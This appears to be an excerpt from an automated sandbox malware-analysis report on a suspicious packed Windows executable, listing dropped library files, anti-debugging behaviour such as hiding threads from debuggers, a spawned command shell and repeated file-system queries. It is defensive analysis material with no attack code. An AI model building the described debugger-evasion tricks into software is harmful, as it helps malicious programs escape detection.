Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_poly1305.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\_win32sysloader.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_MD2.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\_overlapped.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\mfc140u.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\_uuid.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\cryptography\hazmat\bindings\_rust.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\win32com\shell\shell.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\_asyncio.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_keccak.pydJump to dropped file
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeAPI coverage: 5.8 %
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 1_2_70A06A30 GetSystemInfo,VirtualAlloc,VirtualAlloc,1_2_70A06A30
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 0_2_00007FF735C55D50 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF735C55D50
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 0_2_00007FF735C55D50 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF735C55D50
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 0_2_00007FF735C5FF28 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF735C5FF28
Source: PAP46E1UkZ.exe, 00000001.00000003.430980062.000001C62E087000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000002.446050565.000001C62E088000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.430513328.000001C62E035000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: PAP46E1UkZ.exe, 00000001.00000003.423259982.000001C6315C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a+v2DGlUmLdRcUa8JvlNv5MnW63qrAoY3MIz4XFdquCuB2O8Saf5uD5XB2XhlSnr7sk3grNdoMQC7oFCiSCM8L5RJ4SH80ehgFST82YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6YRFe2KQ0yHIM1qIYj7zj0oSZW5Slt2VgQs8hx01yo6lDVFo4k_

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 0_2_00007FF735C59130 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF735C59130
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 1_2_70A701A0 LoadLibraryA,GetProcAddress,GetCurrentThread,RtlWow64SetThreadContext,1_2_70A701A0
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 0_2_00007FF735C61AEC GetProcessHeap,0_2_00007FF735C61AEC
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 0_2_00007FF735C4A4F8 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,0_2_00007FF735C4A4F8
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 0_2_00007FF735C4A69C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF735C4A69C
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 0_2_00007FF735C4AE84 SetUnhandledExceptionFilter,0_2_00007FF735C4AE84
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 0_2_00007FF735C59130 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF735C59130
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 0_2_00007FF735C4ACA0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF735C4ACA0
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 1_2_70A94890 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,1_2_70A94890
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeProcess created: C:\Users\user\Desktop\PAP46E1UkZ.exe C:\Users\user\Desktop\PAP46E1UkZ.exeJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\PublicKey VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Util VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\cryptography VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\cryptography\hazmat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\cryptography\hazmat\bindings VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\certifi VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\cryptography-38.0.3.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\setuptools-57.4.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\ucrtbase.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\_ctypes.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\_socket.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\select.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\_bz2.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\_lzma.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\pyexpat.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\win32api.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\pywintypes39.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\pythoncom39.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\win32com VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\win32com VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\win32com VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\cryptography-38.0.3.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\setuptools-57.4.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\setuptools-57.4.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\setuptools-57.4.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\cryptography-38.0.3.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\cryptography-38.0.3.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\cryptography-38.0.3.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\setuptools-57.4.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\setuptools-57.4.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\setuptools-57.4.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\cryptography-38.0.3.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\cryptography-38.0.3.dist-info VolumeInformationJump to behavior
